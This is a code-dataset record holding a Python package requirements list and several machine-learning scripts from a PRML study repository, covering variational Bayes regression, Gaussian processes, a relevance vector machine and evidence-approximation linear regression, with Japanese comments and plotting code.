\nnumexpr==2.6.1\nnumpy==1.12.1\nnumpydoc==0.6.0\nodo==0.5.0\nopenpyxl==2.4.1\npackaging==16.8\npandas==0.19.2\nparamz==0.7.4\npartd==0.3.7\npathlib2==2.2.0\npatsy==0.4.1\npep8==1.7.0\npexpect==4.2.1\npickleshare==0.7.4\nPillow==4.0.0\nply==3.10\nprompt-toolkit==1.0.9\nprotobuf==3.3.0\npsutil==5.0.1\nptyprocess==0.5.1\npy==1.4.32\npyasn1==0.1.9\npycodestyle==2.3.1\npycosat==0.6.1\npycparser==2.17\npycrypto==2.6.1\npycurl==7.43.0\npyflakes==1.5.0\nPygments==2.1.3\npyknp==0.3\npylint==1.6.4\npymc3==3.0\nPyMySQL==0.7.11\npyOpenSSL==16.2.0\npyparsing==2.2.0\npytest==3.0.5\npython-dateutil==2.6.0\npython-Levenshtein==0.12.0\npytz==2016.10\nPyWavelets==0.5.2\nPyYAML==3.12\npyzmq==16.0.2\nQtAwesome==0.4.3\nqtconsole==4.2.1\nQtPy==1.2.1\nrecommonmark==0.4.0\nredis==2.10.5\nrequests==2.12.4\nrope-py3k==0.9.4.post1\nscikit-image==0.12.3\nscikit-learn==0.18.1\nscipy==0.18.1\nseaborn==0.7.1\nsimplegeneric==0.8.1\nsingledispatch==3.4.0.3\nsix==1.10.0\nsmart-open==1.5.2\nsnowballstemmer==1.2.1\nsockjs-tornado==1.0.3\nSphinx==1.5.1\nspyder==3.1.2\nSQLAlchemy==1.1.5\nstatsmodels==0.6.1\nsympy==1.0\ntables==3.3.0\ntensorflow==1.1.0\nterminado==0.6\nTheano==0.9.0\ntoolz==0.8.2\ntornado==4.4.2\ntqdm==4.11.2\ntraitlets==4.3.2\nunicodecsv==0.14.1\nwcwidth==0.1.7\nWerkzeug==0.12.2\nwidgetsnbextension==1.2.6\nwrapt==1.10.8\nxgboost==0.6\nxlrd==1.0.0\nXlsxWriter==0.9.6\nxlwings==0.10.2\nxlwt==1.2.0\nyapf==0.16.1\n" }, { "alpha_fraction": 0.5031208395957947, "alphanum_fraction": 0.5316540598869324, "avg_line_length": 24.63428497314453, "blob_id": "ffd3d0b9885bcb338b9a8982fe6d2a734d5e6372", "content_id": "d8d14e49137cc3360949014400e2448851efe28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4918, "license_type": "no_license", "max_line_length": 118, "num_lines": 175, "path": "/prml/variance_inference.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n__author__ = \"nyk510\"\n\"\"\"\n10-3 変分ベイズ法による線形回帰モデル\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nnp.random.seed(71)\n\n\ndef t_func(x):\n \"\"\"正解ラベルを作る関数\n x: numpy array.\n return t: target array. numpy.array like.\n \"\"\"\n t = np.sin(x * np.pi)\n # t = np.where(x > 0, 1, -1)\n return t\n\n\ndef plot_target_function(x, ax=None, color=\"default\"):\n \"\"\"target関数(ノイズなし)をプロットします\n \"\"\"\n if ax is None:\n ax = plt.subplot(111)\n if color is \"default\":\n color = \"C0\"\n ax.plot(x, t_func(x), \"--\", label=\"true function\", color=color, alpha=.5)\n return ax\n\n\ndef phi_poly(x):\n dims = 3\n return [x ** i for i in range(0, dims + 1)]\n\n\ndef phi_gauss(x):\n bases = np.linspace(-1, 1, 5)\n return [np.exp(- (x - b) ** 2. * 10.) for b in bases]\n\n\ndef qw(alpha, phi, t, beta):\n \"\"\"\n wの事後分布を計算します。\n 変分事後分布はガウス分布なので決定すべきパラメータは平均と分散です\n w ~ N(w| m, S)\n return ガウス分布のパラメータ m, S\n \"\"\"\n S = beta * phi.T.dot(phi) + alpha * np.eye(phi.shape[1])\n S = np.linalg.inv(S)\n m = beta * S.dot(phi.T).dot(t)\n return m, S\n\n\ndef qbeta(mn, Sn, t, Phi, N, c0, d0):\n \"\"\"\n betaの変分事後分布を決めるcn,dnを計算します\n 変分事後分布はガンマ分布なので決定すべきパラメータは2つです\n beta ~ Gamma(beta | a, b)\n return ガンマ分布のパラメータ a,b\n \"\"\"\n cn = c0 + .5 * N\n dn = d0 + .5 * (np.linalg.norm(t - Phi.dot(mn)) **\n 2. + np.trace(Phi.T.dot(Phi).dot(Sn)))\n return cn, dn\n\n\ndef qalpha(w2, a0, b0, m):\n \"\"\"\n alphaの変分事後分布を計算します。\n 変分事後分布はガンマ分布ですから決定すべきパラメータは2つです\n alpha ~ Gamma(alpha | a, b)\n return a, b\n \"\"\"\n a = a0 + m / 2.\n b = b0 + 1 / 2. * w2\n return a, b\n\n\ndef fit(phi_func, x, update_beta=False):\n xx = np.linspace(-2, 2., 100)\n if phi_func == \"gauss\":\n phi_func = phi_gauss\n elif phi_func == \"poly\":\n phi_func == phi_poly\n else:\n if type(phi_func) == \"function\":\n pass\n else:\n raise Exception(\"invalid phi_func\")\n Phi = np.array([phi_func(xi) for xi in x])\n Phi_xx = np.array([phi_func(xi) for xi in xx])\n\n # 変分事後分布の初期値\n N, m = Phi.shape\n mn = np.zeros(shape=(Phi.shape[1],))\n Sn = np.eye(len(mn))\n beta = 10.\n alpha = .1\n a0, b0 = 1, 1\n c0, d0 = 1, 1\n\n pred_color = \"C1\"\n\n freq = 2\n n_iter = 3 * freq\n n_fig = int(n_iter / freq)\n\n fig = plt.figure(figsize=(3 * n_fig, 4))\n data_iter = []\n data_iter.append([alpha, beta])\n\n for i in range(n_iter):\n print(\"alpha:{alpha:.3g} beta:{beta:.3g}\".format(**locals()))\n\n mn, Sn = qw(alpha, Phi, t, beta)\n w2 = np.linalg.norm(mn) ** 2. + np.trace(Sn)\n a, b = qalpha(w2, a0, b0, m)\n c, d = qbeta(mn, Sn, t, Phi, N, c0, d0)\n\n alpha = a / b\n\n if update_beta:\n # betaが更新される\n beta = c / d\n\n data_iter.append([alpha, beta])\n\n if i % freq == 0:\n k = int(i / freq) + 1\n ax_i = fig.add_subplot(1, n_fig, k)\n plot_target_function(xx, ax=ax_i)\n ax_i.plot(x, t, \"o\", label=\"data\", alpha=.8)\n\n m_line = Phi_xx.dot(mn)\n sigma = (1. / beta + np.diag(Phi_xx.dot(Sn).dot(Phi_xx.T))) ** .5\n ax_i.plot(xx, m_line, \"-\", label=\"predict-line\", color=pred_color)\n ax_i.fill_between(xx, m_line + sigma, m_line - sigma, label=\"Predict 1 sigma\", alpha=.2, color=pred_color)\n ax_i.set_title(\n \"n_iter:{i} alpha:{alpha:.3g} beta:{beta:.3g}\".format(**locals()))\n ax_i.set_ylim(-2, 2)\n ax_i.set_xlim(-1.5, 1.5)\n if i == 0:\n ax_i.legend(loc=4)\n\n fig.tight_layout()\n return fig, data_iter\n\n\nif __name__ == \"__main__\":\n n_samples = 20\n x = np.random.uniform(-1, 1, n_samples)\n noise = np.random.normal(scale=1., size=n_samples)\n t = t_func(x) + noise\n\n plt.figure(figsize=(4, 4))\n xx = np.linspace(-1, 1., 100)\n plot_target_function(xx)\n plt.plot(x, t, \"o\", label=\"data\")\n plt.ylim(-3, 3)\n plt.legend(loc=4)\n plt.tight_layout()\n plt.savefig(\"data.png\", dpi=200)\n\n fig, data_iter = fit(phi_func=\"gauss\", x=x, update_beta=False)\n fig.savefig(\"iter_not update_beta.png\", dpi=200)\n fig, data_iter = fit(phi_func=\"gauss\", x=x, update_beta=True)\n fig.savefig(\"iter_update_beta.png\", dpi=200)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n pd.DataFrame(data_iter, columns=[\"alpha\", \"beta\"]).plot(ax=ax1)\n fig.savefig(\"alpha_beta_trans.png\", dpi=200)\n" }, { "alpha_fraction": 0.4991616904735565, "alphanum_fraction": 0.5257484912872314, "avg_line_length": 28.401409149169922, "blob_id": "1e652d1f23ee10df5cb59b7acbf74033118dc1d8", "content_id": "8ed82f8857fa64a822359800af8da1a1737e13ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4289, "license_type": "no_license", "max_line_length": 118, "num_lines": 142, "path": "/prml/gaussian_process_estimation.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nガウス過程による予測を行うスクリプト\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\n\n\nclass GaussianKernel(object):\n def __init__(self, theta1=9., theta2=4., theta3=1., theta4=1.):\n self.theta1 = theta1\n self.theta2 = theta2\n self.theta3 = theta3\n self.theta4 = theta4\n\n def __call__(self, x1, x2):\n '''Calculate Kernel.\n\n @x1: numpy array. shape (m,).\n @x2: numpy array. shape (m,).\n has the same dimension m of x1.\n '''\n\n return self.theta1 * np.exp(-self.theta2 / 2 * np.linalg.norm(x1 - x2) ** 2) + self.theta3 + self.theta4 * (\n x1 * x2).sum()\n\n\nclass GaussianProcess(object):\n def __init__(self, kernel='gaussian', beta=10.):\n '''\n @kernel: string or GaussianKernel instance.\n @beta: float.\n shrinkage parameter.\n when beta is larger, the predict is more conservative.\n '''\n self.beta = beta\n\n if kernel == 'gaussian':\n self.kernel = GaussianKernel()\n elif isinstance(kernel, GaussianKernel):\n self.kernel = kernel\n else:\n raise TypeError(\"Invalid type kernel.\")\n\n def fit(self, X, t):\n \"\"\"Fit parameter\n calculate data's kernel and it's inverse.\n\n @X: input data xs.\n @t: input data target values. like numpy.array.\n \"\"\"\n self.X = X\n self.t = t\n C = []\n for x_i in X:\n c = []\n for x_k in X:\n c.append(self.kernel(x_i, x_k))\n C.append(c)\n\n C = np.array(C)\n print(C.shape)\n\n # ここがガウス過程での予測のボトルネック: O(N^3)\n self.C_n_inv = np.linalg.inv(np.array(C) + np.eye(len(X)) * self.beta)\n\n return\n\n def predict(self, x):\n \"\"\"predict value\n :param x: \n input value for predict\n :return (m(x),sigma(x))\n tuple of predict value's mean and sigma\n :rtype tuple\n \"\"\"\n\n k = []\n\n # fitに使用したデータとのカーネルを計算\n for x_i in self.X:\n k.append(self.kernel(x, x_i))\n k = np.array(k)\n\n m_x = k.T.dot(self.C_n_inv).dot(self.t)\n variance = self.kernel(x, x) + self.beta - \\\n k.T.dot(self.C_n_inv).dot(k)\n\n return m_x, variance ** .5\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n sample_size_max = 40\n true_function = np.sin\n\n np.random.seed(71)\n x = np.random.uniform(-1, .7, sample_size_max)\n train_t = np.sin(x * np.pi) + np.random.normal(scale=.3, size=sample_size_max)\n train_dataset = [x, train_t]\n plt.plot(x, train_t, \"o\", label='Training Data', color=\"C0\")\n plt.plot(np.linspace(-1, 1, 100), true_function(np.linspace(-1, 1, 100) * np.pi), \"--\", label='True Function',\n color=\"C0\")\n plt.legend(loc=2)\n plt.title(\"training data\")\n\n # training data の保存\n # plt.savefig('True_function_and_training_data.png', dpi=150)\n plt.show()\n\n model = GaussianProcess(beta=.1)\n samples_split = [1, 4, 8, 16, 32]\n plt.figure(figsize=(len(samples_split) * 3, 4))\n for i, sample_num in enumerate(samples_split):\n x = train_dataset[0][:sample_num]\n t = train_dataset[1][:sample_num]\n model.fit(x, t)\n Xs = np.linspace(-1, 1, 100)\n pred_t = []\n for xx in Xs:\n pred_t.append(model.predict(xx))\n pred_t = np.array(pred_t)\n\n plt.subplot(1, len(samples_split), i + 1)\n plt.plot(x, t, \"o\", label='Training Data', color=\"C0\")\n plt.plot(np.linspace(-1, 1, 100), true_function(np.linspace(-1, 1, 100) * np.pi), \"--\", label='True Function',\n color=\"C0\")\n plt.plot(Xs, pred_t[:, 0], \"-\", label='Predict', color=\"C1\")\n plt.fill_between(Xs, pred_t[:, 0] + pred_t[:, 1], pred_t[:, 0] - pred_t[:, 1], alpha=.2,\n label=r'Predict $1-\\sigma$ line', color=\"C1\")\n plt.xlim(-1, 1)\n plt.ylim(-2, 2)\n plt.title(\"Data size: {0}\".format(sample_num))\n if i == 0:\n plt.legend()\n\n plt.tight_layout()\n plt.savefig('../figures/gp-estimation_by_training_data.png', dpi=150)\n plt.show()\n" }, { "alpha_fraction": 0.5208094716072083, "alphanum_fraction": 0.5481099486351013, "avg_line_length": 30.745454788208008, "blob_id": "29475afc392764316dd31bbb367bf3419c65123f", "content_id": "b4d782710274286eeaeb8430e1600f2ec19c35b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5386, "license_type": "no_license", "max_line_length": 112, "num_lines": 165, "path": "/prml/rvm.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nrelevant vector machine\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass RVM(object):\n def __init__(self, alpha=1., beta=1, repeat_num=20, kernel=\"gaussian\"):\n self.init_alpha = alpha\n self.init_beta = beta\n self.repeat_num = repeat_num\n self.kernel_name = kernel\n if kernel == \"gaussian\":\n self.kernel = self.gaussian_kernel\n elif kernel == \"poly\":\n self.kernel = self.poly_kernel\n else:\n raise NameError(\"Invalid Kernel Name\")\n\n def __str__(self):\n s = \"kernel-{0.kernel_name}\".format(self)\n return s\n\n def gaussian_kernel(self, x1, x2):\n \"\"\"\n :param x1: \n :param x2: \n :return: \n \"\"\"\n return np.exp(-(x1 - x2) ** 2) * 10.\n\n def poly_kernel(self, x1, x2):\n d = 5\n return (1 + np.dot(x1, x2)) ** 5\n\n def _compute_loglikelihood(self, beta, A):\n C = 1. / beta * np.eye(self.N) + self.Phi.dot(np.linalg.inv(A)).dot(self.Phi.T)\n return -1 / 2. * (\n self.N * np.log(2. * np.pi) + np.log(np.linalg.det(C)) + self.t.T.dot(np.linalg.inv(C)).dot(self.t))\n\n def fit(self, X, t):\n self.X = np.array(X)\n self.N = len(t)\n self.t = np.array(t)\n Phi = []\n Phi.append(np.ones_like(X))\n for x1 in X:\n Phi.append(self.kernel(x1, X))\n self.Phi = np.array(Phi).T\n sigma_trans = []\n m_trans = []\n alpha_trans = []\n beta_trans = []\n log_likelihoods = []\n\n # 信頼度 alpha と 分散 beta の初期化\n alpha_trans.append(np.ones(len(t) + 1) * self.init_alpha)\n beta_trans.append(self.init_beta)\n\n for x in range(self.repeat_num):\n A = np.diag(alpha_trans[-1])\n log_likelihood = self._compute_loglikelihood(beta_trans[-1], A)\n print(\"log-likelihood\\t{log_likelihood}\".format(**locals()))\n sigma = np.linalg.inv(A + beta_trans[-1] * self.Phi.T.dot(self.Phi))\n m = beta_trans[-1] * sigma.dot(self.Phi.T).dot(t)\n gamma = 1 - alpha_trans[-1] * np.diag(sigma)\n alpha_n = gamma / (m * m)\n beta_n = (self.N - sum(gamma)) / (np.linalg.norm(self.t - self.Phi.dot(m)) ** 2)\n\n # 上限を超えた信頼度になったベクトルの信頼度を切り下げる\n alpha_n[alpha_n > 10e+10] = 10e+10\n\n # logとして配列に保存\n alpha_trans.append(alpha_n)\n beta_trans.append(beta_n)\n m_trans.append(m)\n sigma_trans.append(sigma)\n log_likelihoods.append(log_likelihood)\n\n self.ms = np.array(m_trans)\n self.sigmas = np.array(sigma_trans)\n self.betas = np.array(beta_trans)\n self.alphas = np.array(alpha_trans)\n self.log_likelihoods = np.array(log_likelihoods)\n\n def predict(self, x):\n phi_x = np.r_[np.array([1]), self.kernel(x, self.X)]\n\n avg = self.ms[-1].T.dot(phi_x)\n sigma = 1. / self.betas[-1] + phi_x.T.dot(self.sigmas[-1]).dot(phi_x)\n return avg, sigma\n\n def get_support_vectors(self, min_max_ratio=.2):\n \"\"\"\n サポートベクトルを取得します\n \n :param float min_max_ratio: サポートベクトルの信頼度の割合\n \"\"\"\n\n alpha = self.alphas[-1][1::]\n min_alpha = min(alpha)\n upper_limit = min_alpha / min_max_ratio\n support_X = self.X[alpha < upper_limit]\n support_t = self.t[alpha < upper_limit]\n return support_X, support_t\n\n\nif __name__ == '__main__':\n\n sample_size = 30\n np.random.seed(71)\n\n\n def true_func(x):\n return np.sin(5. * x) + x\n\n\n X = np.random.uniform(low=-1.1, high=1.1, size=sample_size)\n np.sort(X)\n t = true_func(X) + np.random.normal(loc=0., scale=.2, size=sample_size)\n model = RVM(repeat_num=20, kernel=\"gaussian\")\n model.fit(X, t)\n\n X1 = np.linspace(-1.5, 1.5, 100)\n result = []\n for x in X1:\n avg1, sigma1 = model.predict(x)\n result.append([avg1, sigma1])\n result = np.array(result)\n\n fig = plt.figure(figsize=(8, 6))\n ax1 = fig.add_subplot(111)\n ax1.plot(X1, result[:, 0], color=\"C1\", label=\"Predict Mean\")\n ax1.fill_between(X1, result[:, 0] + result[:, 1] ** .5, result[:, 0] - result[:, 1] ** .5, alpha=.2,\n label=\"Predict 1 sigma\", color=\"C1\")\n ax1.plot(X, t, \"o\", color=\"C0\", markersize=5, label=\"Training Data\")\n ax1.plot(X1, true_func(X1), \"--\", label=\"True Function\", color=\"C0\")\n sX, st = model.get_support_vectors()\n ax1.plot(sX, st, \"o\", color=\"C2\", markersize=5, label=\"Support Vectors\")\n ax1.legend()\n ax1.set_xlim(min(X1), max(X1))\n ax1.set_title(str(model))\n fig.savefig(\"../figures/rvm_predict.png\", dpi=150)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n ax1.bar(range(sample_size + 1), np.log(model.alphas[-1]), width=.9)\n ax1.set_title(\"Relevant (log alpha)\")\n ax1.set_xlabel(\"Data Index\")\n ax1.set_ylabel(\"Value (log-scale)\")\n fig.tight_layout()\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n ax1.pcolor(np.log(model.alphas).T)\n ax1.set_xlabel(\"Iteration\")\n ax1.set_ylabel(\"Data Index\")\n ax1.set_title(\"Log Alpha Transition\")\n fig.tight_layout()\n plt.show()\n" }, { "alpha_fraction": 0.5466588735580444, "alphanum_fraction": 0.5663354992866516, "avg_line_length": 30.69135856628418, "blob_id": "978a60d7f545e3f5c1b517fc00d6ec9da0e53a4e", "content_id": "e25c361f8b88e62cd78b4a9004aa21fd36704593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5903, "license_type": "no_license", "max_line_length": 117, "num_lines": 162, "path": "/prml/linear_regression.py", "repo_name": "nyk510/machine-learning", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\"\"\"\nSection3\nLinear Regression\n\"\"\"\n\n__author__ = \"nyk510\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n\nclass LinearRegression(object):\n \"\"\"\n シンプルな線形回帰問題をときます。\n Evidence近似による重みパラメータwの分散αと、ノイズパラメータβの最大化も行います。 \n \"\"\"\n\n def __init__(self, alpha=.001, beta=1., repeat_num=10):\n \"\"\"\n :param alpha_list: alpha格納用リスト。alphaはN(w|o,1/alpha*I)で表される精度パラメータ\n :param beta_list: beta格納用リスト。betaはモデルN(t|w^T*phi(x),1/beta)での精度パラメータ\n :param repeat_num: fitを行う際の繰り返し回数\n \"\"\"\n self.init_alpha = alpha\n self.init_beta = beta\n self.repeat_num = repeat_num\n\n def fit(self, Phi, t):\n \"\"\"\n Xとtからパラメータwを推定\n :param array-like Phi\n training data, shape = (n_samples, n_features)\n :param array-like t:\n labels for Phi, shape = (n_samples, ) \n :return self\n :rtype: LinearRegression\n \"\"\"\n\n t = np.array(t)\n N = len(t)\n dim_w = len(Phi[0])\n # 計画行列の固有値計算を先にしておく\n self.eigenvalues = np.linalg.eig(Phi.T.dot(Phi))[0]\n self.eigenvalues[np.abs(self.eigenvalues) < .0001] = 0. # 情報量が小さい次元の固有値はすべて0だと思うことにする。\n # alphaとbetaを格納する為のリストを用意\n # note:最初はpythonのリストで計算してあとでnumpy.arrayにしたほうが np.append とかよりも早い\n alphas = []\n betas = []\n w = []\n gammas = []\n alphas.append(self.init_alpha)\n betas.append(self.init_beta)\n\n for i in range(self.repeat_num):\n alpha = alphas[-1]\n beta = betas[-1]\n A = alpha * np.eye(dim_w) + beta * Phi.T.dot(Phi)\n # print \"A: \",A\n m_N = np.linalg.solve(A, beta * (Phi.T.dot(t)))\n # print \"m_N\",m_N\n w.append(m_N)\n gam = sum(self.eigenvalues * beta / (self.eigenvalues * beta + alpha))\n gammas.append(gam)\n new_alpha = gam / sum(m_N * m_N)\n new_beta = (N - gam) / ((t - Phi.dot(m_N)).dot(t - Phi.dot(m_N)))\n # print \"a: \",new_alpha,\"b: \",new_beta,\"gamma: \",gam\n alphas.append(new_alpha)\n betas.append(new_beta)\n\n self.alpha_list = np.array(alphas)\n self.beta_list = np.array(betas)\n self.w = np.array(w)\n self.gam = np.array(gammas)\n return self\n\n def predict(self, x):\n \"\"\"\n :param np.ndarray x:\n :rtype np.ndarray\n \"\"\"\n return x.dot(self.w)\n\n\ndef compute_polynominal_matrix(X, dimensions):\n \"\"\"\n 単純な多項式による特徴量を返します\n X: numpy.ndarray like\n return: Phi 特徴量ベクトル numpy.ndarray. len(X)*dimensions 行列\n :type dimensions: object\n \"\"\"\n Phi = [np.ones_like(X)]\n for i in range(dimensions - 1):\n Phi.append(Phi[-1] * X)\n return np.array(Phi).T\n\n\ndef compute_gaussian_phi(X, dim=10, s=1.):\n \"\"\"\n ガウス固定基底に基づく特徴量matrixを返します.\n 固定規定の基準点は [-pi, pi] を dim の数で区切った点.\n :param np.ndarray X:\n 変換する特徴量. shape = (n_samples, )\n\n :param int dim: ガウス基底の次元数\n :param float s: ガウス基底の分散パラメータ\n 大きいと分布がゆるやかになります\n 要するに、予測分布が遠いデータ点の情報も参照する用になります\n \"\"\"\n bins = np.linspace(-np.pi, np.pi, num=dim).reshape(1, -1)\n X = X.reshape(-1, 1)\n dist = X - bins\n phi = np.exp(- dist ** 2. / (2 * s ** 2.))\n return np.hstack((phi, np.ones_like(X)))\n\n\nif __name__ == '__main__':\n\n # make test data\n sample_num = 20\n true_beta = 10. # 精度パラメータ\n phi_dim = 20 # 固定基底の数\n np.random.seed(71)\n X = np.random.uniform(-np.pi, np.pi, sample_num) # -pi~+piまで\n X.sort()\n t = np.sin(X) + np.random.normal(loc=0.0, scale=pow((1 / true_beta), .5), size=sample_num)\n # plt.plot(X,t,\"o\",label=\"Training Data\")\n # plt.plot(np.linspace(-np.pi,np.pi,200),np.sin(np.linspace(-np.pi,np.pi,200)),\"-\",label=\"True Target(No Noize)\")\n # plt.show()\n\n Phi = compute_polynominal_matrix(X, dimensions=phi_dim)\n Phi = compute_gaussian_phi(X, dim=phi_dim, s=1.)\n\n model = LinearRegression(alpha=1e-5, beta=10., )\n model.fit(Phi, t)\n\n # predictionグラフの為の特徴量づくり\n X_p = np.linspace(-np.pi, np.pi, 200)\n # Phi_p = compute_polynominal_matrix(X_p,dimentions=phi_dim) #多項式基底関数\n Phi_p = compute_gaussian_phi(X_p, dim=phi_dim, s=1.) # 今はガウス基底を用います\n print(Phi_p.shape)\n plt.plot(X_p, Phi_p)\n plt.show()\n\n fig1, axes = plt.subplots(1, 2, sharex=False, sharey=True, figsize=(10, 5))\n ax1 = axes[0]\n ax1.set_title(\"Maximum Evidence\")\n ax1.plot(X_p, model.w[-1].dot(Phi_p.T), \"-\", label=\"Prediction\", color=\"C1\")\n ax2 = axes[1]\n ax2.set_title(\"Normal MAP\")\n ax2.plot(X_p, model.w[0].dot(Phi_p.T), \"-\", label=\"Prediction\", color=\"C1\")\n for i in range(2):\n axes[i].plot(np.linspace(-np.pi, np.pi, 200), np.sin(np.linspace(-np.pi, np.pi, 200)), \"--\",\n color=\"C0\", label=\"Truth\")\n axes[i].plot(X, t, \"o\", label=\"Training data\", color=\"C0\", alpha=.8)\n axes[i].set_xlim(-np.pi - .2, np.pi + .2)\n axes[i].set_ylim(-1.5, 1.5)\n axes[i].legend(loc=\"lower right\")\n fig1.tight_layout()\n fig1.savefig(\"../figures/linear_regression_max-evidence_vs_normal-map.png\", dpi=150)\n plt.show()" } ]
11
gabhiramkrishna/SF_DAT_15_WORK
https://github.com/gabhiramkrishna/SF_DAT_15_WORK
76493225c48344e2ee2c834c15ee36ad08e91193
8c166c275310068b936f2910dd24323fddf0a430
4ad0e57ba428e8bfa083574b7ac339a21bd39e2e
refs/heads/master
2021-01-25T10:43:38.090949
2015-07-02T01:42:04
2015-07-02T01:42:04
37,505,849
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066202163696289, "alphanum_fraction": 0.7347270846366882, "avg_line_length": 32.11538314819336, "blob_id": "02e0aebc1c95c0ea55db3820d196d0e17f03cfe1", "content_id": "c1bfddbe610f47f16322a59e12dcdaef91e80748", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4305, "license_type": "no_license", "max_line_length": 127, "num_lines": 130, "path": "/hw1.py", "repo_name": "gabhiramkrishna/SF_DAT_15_WORK", "src_encoding": "UTF-8", "text": "'''\nMove this code into your OWN SF_DAT_15_WORK repo\n\nPlease complete each question using 100% python code\n\nIf you have any questions, ask a peer or one of the instructors!\n\nWhen you are done, add, commit, and push up to your repo\n\nThis is due 7/1/2015\n'''\n\n\nimport pandas as pd\n# pd.set_option('max_colwidth', 50)\n# set this if you need to\n\nkillings = pd.read_csv('https://raw.githubusercontent.com/sinanuozdemir/SF_DAT_15/master/hw/data/police-killings.csv')\nkillings.head()\n\n\n# 1. Make the following changed to column names:\n# lawenforcementagency -> agency\n# raceethnicity -> race\n\nkillings.rename(columns={'raceethnicity':'race', 'lawenforcementagency':'agency'}, inplace=True)\n\n# 2. Show the count of missing values in each column\n\nkillings.isnull().sum()\n\n# 3. replace each null value in the dataframe with the string \"Unknown\"\n\nkillings.fillna(value='Unknown', inplace=True)\n\n# 4. How many killings were there so far in 2015?\n\nkillings[killings.year==2015].year.value_counts() #467\n\n\n# 5. Of all killings, how many were male and how many female?\n\nkillings.gender[killings.gender=='Male'].value_counts() #445\nkillings.gender[killings.gender=='Female'].value_counts() #22\n# 6. How many killings were of unarmed people?\n\nkillings.armed[killings.armed=='No'].value_counts() #10\n# 7. What percentage of all killings were unarmed?\n\nkillings.armed[killings.armed=='No'].value_counts() / killings.shape[0] * 100 #21%\n# 8. What are the 5 states with the most killings?\n\nkillings.groupby('state').state.count()\n# 9. Show a value counts of deaths for each race\n\nkillings.groupby('race').race.count()\n\n# 10. Display a histogram of ages of all killings\n\nkillings.hist(by=killings.age, sharex=True, sharey=True)\n\n# 11. Show 6 histograms of ages by race\n\nkillings.hist(by=killings.race, sharex=True, sharey=True, bins=6)\n\n\n# 12. What is the average age of death by race?\n\nkillings.groupby('race').age.mean()\n\n# 13. Show a bar chart with counts of deaths every month\n\nkillings.month.value_counts().plot(kind='bar', title = 'count of deaths every month')\n\n\n###################\n### Less Morbid ###\n###################\n\nmajors = pd.read_csv('https://raw.githubusercontent.com/sinanuozdemir/SF_DAT_15/master/hw/data/college-majors.csv')\nmajors.head()\n\n# 1. Delete the columns (employed_full_time_year_round, major_code)\ndel majors['Employed_full_time_year_round']\ndel majors['Major_code']\n\n# 2. Show the cout of missing values in each column\n\nmajors.isnull().sum()\n\n# 3. What are the top 10 highest paying majors?\ntopTenMajors = majors.sort_index(by='Median', ascending=False).head(10)\n\n# 4. Plot the data from the last question in a bar chart, include proper title, and labels!\n\ntopTenMajors[['Major','Median']].plot(kind='bar', title='Top 10 highest paying majors', x='Major', y='Median')\n\n# 5. What is the average median salary for each major category?\n\nmajors.groupby('Major_category').Median.mean()\n\n# 6. Show only the top 5 paying major categories\nmajors.sort_index(by='Median', ascending=False).head()\n\n# 7. Plot a histogram of the distribution of median salaries\n\nmajors.hist(by=majors.Median, sharex=True, sharey=True)\n\n# 8. Plot a histogram of the distribution of median salaries by major category\nmajors.groupby('Major_category').Median.mean().plot(kind='bar', title='Bar chart of average median salaries by major category')\n\n# 9. What are the top 10 most UNemployed majors?\n# What are the unemployment rates?\nmajors.sort_index(by='Unemployed', ascending=False)[['Major', 'Unemployment_rate', 'Unemployed']].head(10)\n\n# 10. What are the top 10 most UNemployed majors CATEGORIES? Use the mean for each category\n# What are the unemployment rates?\nmajors.groupby('Major_category').Unemployed.mean().order(ascending = False).head(10)\n\n# 11. the total and employed column refer to the people that were surveyed.\n# Create a new column showing the emlpoyment rate of the people surveyed for each major\n# call it \"sample_employment_rate\"\n# Example the first row has total: 128148 and employed: 90245. it's \n# sample_employment_rate should be 90245.0 / 128148.0 = .7042\nmajors['sample_employment_rate'] = majors.Employed/majors.Total\n\n# 12. Create a \"sample_unemployment_rate\" colun\n# this column should be 1 - \"sample_employment_rate\"\n\nmajors['sample_unemployment_rate'] =1 - majors.sample_employment_rate\n" }, { "alpha_fraction": 0.7083333134651184, "alphanum_fraction": 0.75, "avg_line_length": 23.5, "blob_id": "e0b1fe9af8e1053070124039997981451bd18eac", "content_id": "851753885ef8580b6fa44e3d31844e8de9a8c7eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/README.md", "repo_name": "gabhiramkrishna/SF_DAT_15_WORK", "src_encoding": "UTF-8", "text": "# SF_DAT_15_WORK\nMy data science work - modified" } ]
2
Ankit404butfound/indic_transliteration
https://github.com/Ankit404butfound/indic_transliteration
c04f3fd96d22a30ce2aa3ca5bcd1151144852a46
0be35c398a7291184a21b107d21610c6465827b8
3c8ba8a14b4c40671439e0e7a18cd7e2b5089f5f
refs/heads/master
2022-10-07T10:42:56.588750
2020-06-07T15:38:03
2020-06-07T15:38:03
null
0
0
null
null
null
null
null
